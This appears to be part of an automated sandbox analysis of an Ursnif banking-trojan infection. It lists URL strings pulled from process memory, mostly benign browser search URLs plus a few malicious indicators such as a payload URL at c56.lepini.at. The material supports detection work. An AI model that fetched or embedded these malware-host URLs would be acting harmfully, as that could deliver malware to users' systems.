Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmp | String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://buscar.ya.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp | String found in binary or memory: http://c56.lepini.at/e3
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp, explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp | String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.dat
Source: explorer.exe, 00000024.00000000.486779764.0000000008907000.00000004.00000001.sdmp | String found in binary or memory: http://c56.lepini.at/jvassets/xI/t64.datings
Source: explorer.exe, 00000024.00000002.494453261.0000000001464000.00000004.00000020.sdmp | String found in binary or memory: http://c56.lepini.at/l
Source: explorer.exe, 00000024.00000000.487000468.00000000089C7000.00000004.00000001.sdmp | String found in binary or memory: http://c56.lepini.at:80/jvassets/xI/t64.dat:
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: rundll32.exe, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txt
Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp | String found in binary or memory: http://constitution.org/usdeclar.txtC:
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000024.00000000.488894525.000000000F540000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmp | String found in binary or memory: http://es.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://esearch.rakuten.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espanol.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://espn.go.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://find.joins.com/
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://fr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://google.pchome.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://home.altervista.org/favicon.ico
          Source: rundll32.exe, 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, powershell.exe, 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, explorer.exe, 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, control.exe, 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmpString found in binary or memory: http://https://file://USER.ID%lu.exe/upd
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie.search.yahoo.com/os?command=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://images.monster.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.atlas.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://in.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.dada.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://it.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://jobsearch.monster.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://kr.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://msk.afisha.ru/
          Source: powershell.exe, 0000001C.00000002.526166101.000002219006F000.00000004.00000001.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ocnsearch.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://openimage.interpark.com/interpark.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://p.zhongsou.com/favicon.ico
          Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://price.ru/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.linternaute.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://recherche.tf1.fr/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://rover.ebay.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://ru.search.yahoo.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sads.myspace.com/
          Source: powershell.exe, 0000001C.00000002.508878039.0000022180001000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search-dyn.tiscali.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.about.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.alice.it/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.aol.in/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.atlas.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auction.co.kr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.auone.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.books.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.centrum.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.chol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.cn.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000024.00000000.477235518.0000000006100000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.com
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: powershell.exe, 0000001C.00000002.509128308.000002218020E000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.487100472.0000000008B46000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000024.00000000.478519580.00000000061F3000.00000002.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico

          Key, Mouse, Clipboard, Microphone and Screen Capturing:

          Yara detected Ursnif
